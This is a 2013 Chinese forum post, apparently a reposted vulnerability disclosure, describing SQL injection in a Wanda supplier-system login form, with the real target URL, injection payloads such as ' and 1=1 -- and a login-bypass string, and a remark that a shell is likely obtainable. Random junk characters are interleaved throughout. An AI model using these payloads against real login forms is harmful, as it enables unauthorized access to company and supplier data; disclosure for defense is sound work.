找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2777|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
; V* S$ T: _9 P' K& _详细说明:" i- O* W% @' K1 ?
万达scm系统登陆框sql注入。
  ~  w& J6 V6 z+ g, j2 V( Q, A6 L' X: f" y3 p2 i6 R/ N8 |/ B" E) i
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27$ \& F; G- ]+ x
: i: z1 z4 O' E7 \) A* x
& P' ~/ O: [0 y9 r8 x- p
500错误。' u0 f2 }, n; A. c2 _0 Y( ?
3 s3 w/ n+ i1 `( J, C  B
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
1 d" I* R+ {( t$ \http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png' v  \0 W! g1 t$ O
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)- m7 J) P( o+ P4 b
经过分析,登陆验证的过程应该是:9 G! y8 k2 D. G0 v

9 ~% i: M+ s7 M% J5 Q' e' P# z9 N% k取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。8 H/ F% {7 n$ R; l
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
4 f5 ~& W/ s, O6 P  O) u# X7 ~- B: O
# \4 n* U6 g9 l" Q4 [oracle数据库,存在注入点。@大连万达,你怎么看?# y4 O- {5 Q' q6 Z
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
4 e5 P. P2 Q+ W5 W( ^  F2 |( p. y# M$ O! x
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
7 b& r. M& n; H" J2 ]& K( X& P漏洞证明:
% ]# ^* M! @& s8 k万达scm系统登陆框sql注入。! d6 R( z7 |6 b" P2 }
, E) @4 i4 ]7 |& T1 r. D. I( W
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
+ P5 x  B1 {7 L2 }' D" k3 X* C0 H

& g7 ]( [/ x$ K" H7 e500错误。* G  O- C* e8 H* q
/ h; Y: Z5 W3 I
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
1 e# A, P" t) q9 chttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png/ L5 q. L- D; f9 a7 D. c

; X( R, d8 ~6 }, U' C2 @( e  l& E8 X( I: K
(截图有一点问题)
4 U2 j2 D3 E- [0 X% O' {) b1 |5 A& s: _
2 r8 ~! f3 b" A1 k; H& v. P怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
* ]/ f8 u7 f4 N- r
4 ~1 Z3 W) ?7 Y3 t0 S' a' V& y取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。. B/ C$ y# M+ b: O( t& {' l0 w
. d9 j1 w) e+ _; {# C3 Q. u( j
绕过:
  N% R' D5 u1 m" S2 qhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1/ C$ I& v* ~* O. N# \9 {

1 f) u# A) K( y9 j& W6 j; r: c( P" u8 d" g/ H9 \
oracle数据库,存在注入点。@大连万达,你怎么看?
# ^7 o% p  I' c​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。: X& }7 z! r3 ~+ q( _
  W! l+ M/ v! M5 v$ E, N0 M6 F
修复方案:) |% A" A" N9 S% J! }
。。。2 N2 j9 ?, o% G" q) ?, m2 p% p7 h
3 i; q! S6 d: u. |
# V( C  i. p' ^  Q$ Q; H7 `, P
厂商已经确认' Z; L0 D/ P; K7 w  F

; _2 X1 z, r7 M1 N! ~% Z[/td][/tr]& Z$ Z0 ^& ?6 k% h
[/table]. n% o/ ?  ^* m
9 k4 W6 l# g3 ]6 L( U2 I" [( a5 @
9 |, ]  J: u. Z& \4 m8 k7 B2 g' R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表